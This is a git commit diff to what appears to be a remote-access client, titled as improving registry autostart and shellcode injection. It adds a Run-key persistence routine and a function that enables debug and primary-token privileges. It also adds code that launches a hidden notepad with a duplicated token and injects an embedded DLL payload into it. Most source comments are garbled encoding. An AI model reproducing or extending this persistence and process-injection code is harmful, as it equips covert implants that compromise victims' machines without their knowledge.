fix: Improve creating registry and injecting shellcode
This commit is contained in:
yuanyuanxiang
@@ -156,59 +156,7 @@ DWORD WaitForMultipleHandlesEx(
|
||||
|
||||
#if _CONSOLE
|
||||
|
||||
//<2F><><EFBFBD><EFBFBD>Ȩ<EFBFBD><C8A8>
|
||||
void DebugPrivilege()
|
||||
{
|
||||
HANDLE hToken = NULL;
|
||||
//<2F><EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD>̵ķ<CCB5><C4B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
int hRet = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
|
||||
|
||||
if (hRet)
|
||||
{
|
||||
TOKEN_PRIVILEGES tp;
|
||||
tp.PrivilegeCount = 1;
|
||||
//ȡ<><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ȩ<EFBFBD><EFBFBD>LUID
|
||||
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
|
||||
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƶ<EFBFBD>Ȩ<EFBFBD><C8A8>
|
||||
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
|
||||
|
||||
CloseHandle(hToken);
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* @brief <20><><EFBFBD>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
* @param[in] *sPath ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
|
||||
* @param[in] *sNmae ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
* @return <20><><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
* @details Win7 64λ<34><CEBB><EFBFBD><EFBFBD><EFBFBD>ϲ<EFBFBD><CFB2>Խ<EFBFBD><D4BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>ڣ<EFBFBD>\n
|
||||
* HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
|
||||
* @note <20>״<EFBFBD><D7B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>Թ<EFBFBD><D4B9><EFBFBD>ԱȨ<D4B1><C8A8><EFBFBD><EFBFBD><EFBFBD>У<EFBFBD><D0A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>д<EFBFBD>뿪<EFBFBD><EBBFAA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
*/
|
||||
BOOL SetSelfStart(const char* sPath, const char* sNmae)
|
||||
{
|
||||
DebugPrivilege();
|
||||
|
||||
// д<><D0B4><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
|
||||
#define REGEDIT_PATH "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
|
||||
|
||||
// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
||||
HKEY hKey = NULL;
|
||||
LONG lRet = RegOpenKeyExA(HKEY_LOCAL_MACHINE, REGEDIT_PATH, 0, KEY_ALL_ACCESS, &hKey);
|
||||
|
||||
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
|
||||
if (lRet != ERROR_SUCCESS)
|
||||
return FALSE;
|
||||
|
||||
lRet = RegSetValueExA(hKey, sNmae, 0, REG_SZ, (const BYTE*)sPath, strlen(sPath) + 1);
|
||||
|
||||
// <20>ر<EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>
|
||||
RegCloseKey(hKey);
|
||||
|
||||
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
|
||||
return lRet == ERROR_SUCCESS;
|
||||
}
|
||||
#include "auto_start.h"
|
||||
|
||||
// <20><><EFBFBD>ؿ<EFBFBD><D8BF><EFBFBD>̨
|
||||
// <20>ο<EFBFBD><CEBF><EFBFBD>https://blog.csdn.net/lijia11080117/article/details/44916647
|
||||
|
||||
@@ -16,12 +16,19 @@ class ShellcodeInj
|
||||
{
|
||||
public:
|
||||
// Return the process id if inject succeed.
|
||||
int InjectProcess(const char* processName = nullptr) {
|
||||
int InjectProcess(const char* processName = nullptr, bool hasPermission=false) {
|
||||
if (processName) {
|
||||
auto pid = GetProcessIdByName(processName);
|
||||
if (pid ? InjectShellcode(pid, (BYTE*)TinyRun_dll, TinyRun_dll_len) : false)
|
||||
return pid;
|
||||
}
|
||||
if (hasPermission) {
|
||||
auto pid = LaunchNotepadWithCurrentToken();
|
||||
if (pid) {
|
||||
return InjectShellcode(pid, (BYTE*)TinyRun_dll, TinyRun_dll_len) ? pid : 0;
|
||||
}
|
||||
}
|
||||
|
||||
PROCESS_INFORMATION pi = {};
|
||||
STARTUPINFO si = { sizeof(STARTUPINFO) };
|
||||
si.dwFlags = STARTF_USESHOWWINDOW;
|
||||
@@ -34,6 +41,49 @@ public:
|
||||
return 0;
|
||||
}
|
||||
private:
|
||||
DWORD LaunchNotepadWithCurrentToken() {
|
||||
HANDLE hToken = NULL;
|
||||
|
||||
// <20><EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD><EFBFBD> token
|
||||
if (!OpenProcessToken(GetCurrentProcess(),
|
||||
TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID,
|
||||
&hToken)) {
|
||||
Mprintf("OpenProcessToken failed: %d\n", GetLastError());
|
||||
return 0;
|
||||
}
|
||||
|
||||
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> token
|
||||
HANDLE hNewToken = NULL;
|
||||
if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) {
|
||||
Mprintf("DuplicateTokenEx failed: %d\n", GetLastError());
|
||||
CloseHandle(hToken);
|
||||
return 0;
|
||||
}
|
||||
|
||||
STARTUPINFOW si = { sizeof(si) };
|
||||
PROCESS_INFORMATION pi = {};
|
||||
si.dwFlags = STARTF_USESHOWWINDOW;
|
||||
si.wShowWindow = SW_HIDE;
|
||||
|
||||
// ʹ<>ø<EFBFBD><C3B8>ƺ<EFBFBD><C6BA><EFBFBD> token <20><><EFBFBD><EFBFBD> notepad
|
||||
if (!CreateProcessWithTokenW(hNewToken, 0, L"C:\\Windows\\System32\\notepad.exe",
|
||||
NULL, 0, NULL, NULL, &si, &pi)) {
|
||||
Mprintf("CreateProcessWithTokenW failed: %d\n", GetLastError());
|
||||
CloseHandle(hToken);
|
||||
CloseHandle(hNewToken);
|
||||
return 0;
|
||||
}
|
||||
|
||||
DWORD dwProcessId = pi.dwProcessId;
|
||||
|
||||
CloseHandle(pi.hProcess);
|
||||
CloseHandle(pi.hThread);
|
||||
CloseHandle(hToken);
|
||||
CloseHandle(hNewToken);
|
||||
|
||||
return dwProcessId; // <20><><EFBFBD><EFBFBD><EFBFBD>ӽ<EFBFBD><D3BD><EFBFBD> ID
|
||||
}
|
||||
|
||||
// Find process id by name.
|
||||
DWORD GetProcessIdByName(const std::string& procName) {
|
||||
DWORD pid = 0;
|
||||
|
||||
@@ -159,6 +159,7 @@
|
||||
<ClCompile Include="test.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="auto_start.h" />
|
||||
<ClInclude Include="MemoryModule.h" />
|
||||
<ClInclude Include="resource1.h" />
|
||||
</ItemGroup>
|
||||
|
||||
64
client/auto_start.h
Normal file
64
client/auto_start.h
Normal file
@@ -0,0 +1,64 @@
|
||||
#pragma once
|
||||
#include <windows.h>
|
||||
|
||||
// <20><><EFBFBD><EFBFBD>Ȩ<EFBFBD><C8A8>
|
||||
inline int DebugPrivilege()
|
||||
{
|
||||
HANDLE hToken = NULL;
|
||||
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
|
||||
return -1;
|
||||
|
||||
// <20><>̬<EFBFBD><CCAC><EFBFBD><EFBFBD><EFBFBD>ռ䣬<D5BC><E4A3AC><EFBFBD><EFBFBD> 3 <20><> LUID
|
||||
TOKEN_PRIVILEGES* tp = (TOKEN_PRIVILEGES*)malloc(sizeof(TOKEN_PRIVILEGES) + 2 * sizeof(LUID_AND_ATTRIBUTES));
|
||||
if (!tp) { CloseHandle(hToken); return 1; }
|
||||
|
||||
tp->PrivilegeCount = 3;
|
||||
|
||||
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp->Privileges[0].Luid)) { free(tp); CloseHandle(hToken); return 2; }
|
||||
tp->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
|
||||
if (!LookupPrivilegeValue(NULL, SE_INCREASE_QUOTA_NAME, &tp->Privileges[1].Luid)) { free(tp); CloseHandle(hToken); return 3; }
|
||||
tp->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
|
||||
if (!LookupPrivilegeValue(NULL, SE_ASSIGNPRIMARYTOKEN_NAME, &tp->Privileges[2].Luid)) { free(tp); CloseHandle(hToken); return 4; }
|
||||
tp->Privileges[2].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
|
||||
AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(TOKEN_PRIVILEGES) + 2 * sizeof(LUID_AND_ATTRIBUTES), NULL, NULL);
|
||||
|
||||
free(tp);
|
||||
CloseHandle(hToken);
|
||||
return 0;
|
||||
}
|
||||
|
||||
/**
|
||||
* @brief <20><><EFBFBD>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
* @param[in] *sPath ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
|
||||
* @param[in] *sNmae ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
* @return <20><><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
* @details Win7 64λ<34><CEBB><EFBFBD><EFBFBD><EFBFBD>ϲ<EFBFBD><CFB2>Խ<EFBFBD><D4BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>ڣ<EFBFBD>\n
|
||||
* HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
|
||||
* @note <20>״<EFBFBD><D7B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>Թ<EFBFBD><D4B9><EFBFBD>ԱȨ<D4B1><C8A8><EFBFBD><EFBFBD><EFBFBD>У<EFBFBD><D0A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>д<EFBFBD>뿪<EFBFBD><EBBFAA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
*/
|
||||
inline BOOL SetSelfStart(const char* sPath, const char* sNmae)
|
||||
{
|
||||
DebugPrivilege();
|
||||
|
||||
// д<><D0B4><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
|
||||
#define REGEDIT_PATH "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
|
||||
|
||||
// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
||||
HKEY hKey = NULL;
|
||||
LONG lRet = RegOpenKeyExA(HKEY_CURRENT_USER, REGEDIT_PATH, 0, KEY_ALL_ACCESS, &hKey);
|
||||
|
||||
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
|
||||
if (lRet != ERROR_SUCCESS)
|
||||
return FALSE;
|
||||
|
||||
lRet = RegSetValueExA(hKey, sNmae, 0, REG_SZ, (const BYTE*)sPath, strlen(sPath) + 1);
|
||||
|
||||
// <20>ر<EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>
|
||||
RegCloseKey(hKey);
|
||||
|
||||
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
|
||||
return lRet == ERROR_SUCCESS;
|
||||
}
|
||||
@@ -211,6 +211,7 @@
|
||||
<ClInclude Include="..\server\2015Remote\pwd_gen.h" />
|
||||
<ClInclude Include="Audio.h" />
|
||||
<ClInclude Include="AudioManager.h" />
|
||||
<ClInclude Include="auto_start.h" />
|
||||
<ClInclude Include="Buffer.h" />
|
||||
<ClInclude Include="CaptureVideo.h" />
|
||||
<ClInclude Include="Common.h" />
|
||||
|
||||
@@ -6,10 +6,12 @@
|
||||
#include <common/commands.h>
|
||||
#include "common/dllRunner.h"
|
||||
#include <common/iniFile.h>
|
||||
#include "auto_start.h"
|
||||
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
|
||||
// <20>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>ֵ
|
||||
#define REG_NAME "a_ghost"
|
||||
#define REG_NAME "ClientDemo"
|
||||
|
||||
typedef void (*StopRun)();
|
||||
|
||||
@@ -32,60 +34,6 @@ HANDLE hEvent = NULL;
|
||||
|
||||
CONNECT_ADDRESS g_ConnectAddress = { FLAG_FINDEN, "127.0.0.1", "6543", CLIENT_TYPE_DLL, false, DLL_VERSION, 0, Startup_InjSC };
|
||||
|
||||
//<2F><><EFBFBD><EFBFBD>Ȩ<EFBFBD><C8A8>
|
||||
void DebugPrivilege()
|
||||
{
|
||||
HANDLE hToken = NULL;
|
||||
//<2F><EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD>̵ķ<CCB5><C4B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
int hRet = OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
|
||||
|
||||
if( hRet)
|
||||
{
|
||||
TOKEN_PRIVILEGES tp;
|
||||
tp.PrivilegeCount = 1;
|
||||
//ȡ<><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ȩ<EFBFBD><EFBFBD>LUID
|
||||
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);
|
||||
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƶ<EFBFBD>Ȩ<EFBFBD><C8A8>
|
||||
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
|
||||
|
||||
CloseHandle(hToken);
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* @brief <20><><EFBFBD>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
* @param[in] *sPath ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
|
||||
* @param[in] *sNmae ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
* @return <20><><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
* @details Win7 64λ<34><CEBB><EFBFBD><EFBFBD><EFBFBD>ϲ<EFBFBD><CFB2>Խ<EFBFBD><D4BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>ڣ<EFBFBD>\n
|
||||
* HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
|
||||
* @note <20>״<EFBFBD><D7B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>Թ<EFBFBD><D4B9><EFBFBD>ԱȨ<D4B1><C8A8><EFBFBD><EFBFBD><EFBFBD>У<EFBFBD><D0A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>д<EFBFBD>뿪<EFBFBD><EBBFAA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||||
*/
|
||||
BOOL SetSelfStart(const char *sPath, const char *sNmae)
|
||||
{
|
||||
DebugPrivilege();
|
||||
|
||||
// д<><D0B4><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
|
||||
#define REGEDIT_PATH "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
|
||||
|
||||
// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
||||
HKEY hKey = NULL;
|
||||
LONG lRet = RegOpenKeyExA(HKEY_LOCAL_MACHINE, REGEDIT_PATH, 0, KEY_ALL_ACCESS, &hKey);
|
||||
|
||||
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
|
||||
if(lRet != ERROR_SUCCESS)
|
||||
return FALSE;
|
||||
|
||||
lRet = RegSetValueExA(hKey, sNmae, 0, REG_SZ, (const BYTE*)sPath, strlen(sPath) + 1);
|
||||
|
||||
// <20>ر<EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>
|
||||
RegCloseKey(hKey);
|
||||
|
||||
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
|
||||
return lRet == ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL CALLBACK callback(DWORD CtrlType)
|
||||
{
|
||||
if (CtrlType == CTRL_CLOSE_EVENT)
|
||||
@@ -252,7 +200,8 @@ public:
|
||||
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ھʹ<DABE><CDB4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>л<EFBFBD>ȡIP<49>Ͷ˿<CDB6>.
|
||||
int main(int argc, const char *argv[])
|
||||
{
|
||||
if(!SetSelfStart(argv[0], REG_NAME))
|
||||
BOOL ok = SetSelfStart(argv[0], REG_NAME);
|
||||
if(!ok)
|
||||
{
|
||||
Mprintf("<EFBFBD><EFBFBD><EFBFBD>ÿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD>ܣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ù<EFBFBD><EFBFBD><EFBFBD>ԱȨ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.\n");
|
||||
}
|
||||
@@ -279,7 +228,7 @@ int main(int argc, const char *argv[])
|
||||
do {
|
||||
if (sizeof(void*) == 4) // Shell code is 64bit
|
||||
break;
|
||||
if (!(pid = inj.InjectProcess(nullptr))) {
|
||||
if (!(pid = inj.InjectProcess(nullptr, ok))) {
|
||||
break;
|
||||
}
|
||||
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);
|
||||
|
||||
Reference in New Issue
Block a user